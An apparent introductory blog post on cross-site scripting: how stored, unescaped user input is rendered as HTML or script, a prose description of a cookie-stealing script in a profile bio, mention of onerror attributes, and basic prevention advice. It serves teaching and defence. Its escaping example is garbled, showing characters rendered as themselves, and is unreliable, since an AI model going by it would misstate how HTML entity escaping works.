Introduction
XSS stands for Cross-Site Scripting. The web works using HTML which uses angular brackets which act as an instruction to the web browser, for example by specifying text in the <b>
tag, you are instructing the browser to display some bold text. If you want to write an angle bracket as text and not as an instruction, you do something which is called escaping, it is using some specific codes in the text so that the browser renders the specific codes to something else, like the browser would render <
as <
and it would render >
as >
. Web apps usually take inputs from the user and store it in their database, and then render the data when required. So when a hacker, sends html as data to the database via the web app, the html is stored in the db, and when the same data is rendered as html, they affect the page and get inserted as HTML into the specific web page. This is what is called cross-site scripting. This was harmful to the users of the web app as suppose you set </html>
as your bio, when a user visits your profile and see your bio, the html tag would end for them, thus not rendering the remaining web page. This was a deadly attack for the websites.
Then JavaScript comes along, and XSS attacks get even more deadlier for the websites, you can insert JavaScript in a website just by including a <script></script>
tag in the HTML and specifying the JavaScript inside the script tag. This is really dangerous as when it is executed on the victim's device, it may steal sensitive information. Suppose you write a script tag along with JavaScript which steals the cookies of the victim as your profile bio on a website that does not filter the tags, so whenever some user would visit your profile the script would get executed and the victim's cookies would be stolen.
HTML tags are not the only possibility for exploiting a website using XSS. There other vulnerabilities as well. Anything that acts on a user input, can be used to exploit the website, e.g.: functions. Attributes like onerror
could also be used to exploit a website using XSS.
Preventive Measures
- Websites must use XSS filtering on their websites, so that the HTML tags are filtered out.
- Websites must escape the Html tag angle brackets while storing some user input in the database
- Websites must test their user interface, so that they leave no XSS vulnerability.
XSS vulnerabilities can be endless, therefore websites organize bug bounty programs to find these vulnerabilities.
Links
You can use the following websites to find out how XSS exploits work:
Top comments (3)
Some comments may only be visible to logged-in visitors. Sign in to view all comments.